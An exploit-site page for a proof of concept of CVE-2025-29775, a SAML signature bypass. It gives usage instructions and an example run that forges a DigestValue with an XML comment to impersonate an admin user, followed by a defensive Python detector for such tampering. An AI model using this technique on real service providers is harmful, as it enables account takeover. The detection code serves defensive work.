## https://sploitus.com/exploit?id=1C3B678E-C109-553B-8D92-7010342631BC
# Proof of concept for CVE-2025-29775
This PoC variant requires a file containing the POST request with a signed SAML response.

Usage: `python cve-2025-29775.py [filename] [parameter] [username] [algorithm]`

Algorithms supported: sha1, sha256, sha384, sha512

* Filename: Name of the file containing the POST request with the SAML response
* Parameter: Name of the parameter containing the URL-encoded, base64-encoded SAML response
* Username: Username to impersonate
* Algorithm: Hashing algorithm to be used

Example run:
```
python cve-2025-29775.py req.txt samlResponse admin@vulnerable.com sha256
Username inserted: admin@vulnerable.com
Signature removed...
Original digest value: MSZxVlked38OM6yV0JOm0Cp/Vm1S4Fn4VpCalyGF1B8=
New digest value: <!--16yA5mQTuW+pcS8aRmqpXl9ozriR97TyiAzeiuuUuX4=-->MSZxVlked38OM6yV0JOm0Cp/Vm1S4Fn4VpCalyGF1B8=
Hashing algorithm used: sha256
Signature with malicious digest inserted...
Full request (copied to clipboard):
POST /login/callback HTTP/1.1
Host: localhost
Cookie: foo=bar;
User-Agent: Netscape
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 7082
Origin: https://idp.localhost.me
Referer: https://idp.localhost.me
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Priority: u=0, i
Te: trailers
Connection: keep-alive
SAMLResponse=[snip]
```
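
The "New digest value" line in the output above shows a `DigestValue` whose content is an XML comment followed by the original digest. As a defensive check (an added example, not part of this PoC or of any SAML library), the following Python function decodes a `SAMLResponse` parameter and flags any `ds:DigestValue` that contains something other than plain text. The function names and the sample documents are constructed for illustration, and the input is assumed to be URL-encoded base64.

```python
import base64
from urllib.parse import quote, unquote
from xml.dom import Node, minidom

DSIG_NS = "http://www.w3.org/2000/09/xmldsig#"


def digest_value_findings(saml_response_param):
    """Flag ds:DigestValue elements containing anything but plain text.

    Input is the SAMLResponse form value (URL-encoded base64, an assumption).
    """
    xml_bytes = base64.b64decode(unquote(saml_response_param))
    # minidom does not defend against entity expansion, so reject DTDs up
    # front (this byte check assumes a UTF-8 or ASCII document).
    if b"<!DOCTYPE" in xml_bytes:
        return ["DOCTYPE present, document not parsed"]
    doc = minidom.parseString(xml_bytes)
    findings = []
    for dv in doc.getElementsByTagNameNS(DSIG_NS, "DigestValue"):
        # A well-formed digest is a single text node; comments, CDATA or
        # child elements inside it are reported.
        extra = [c for c in dv.childNodes if c.nodeType != Node.TEXT_NODE]
        for node in extra:
            kind = "comment" if node.nodeType == Node.COMMENT_NODE else "non-text node"
            findings.append(f"DigestValue contains {kind}: {node.toxml()}")
    return findings


def _encode(xml):
    """Build a constructed SAMLResponse parameter value from an XML string."""
    return quote(base64.b64encode(xml.encode()).decode(), safe="")


# Constructed sample documents (placeholder digests, not real SAML responses).
_TEMPLATE = (
    '<Response xmlns:ds="http://www.w3.org/2000/09/xmldsig#">'
    "<ds:Signature><ds:SignedInfo><ds:Reference>"
    "<ds:DigestValue>{}</ds:DigestValue>"
    "</ds:Reference></ds:SignedInfo></ds:Signature></Response>"
)
CLEAN = _encode(_TEMPLATE.format("QUJDRA=="))
TAMPERED = _encode(_TEMPLATE.format("<!--RUZHSA==-->QUJDRA=="))

if __name__ == "__main__":
    for name, value in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, digest_value_findings(value))
```

A check like this fits in a gateway or log pipeline that sees the callback POST body; it does not replace signature validation in the service provider.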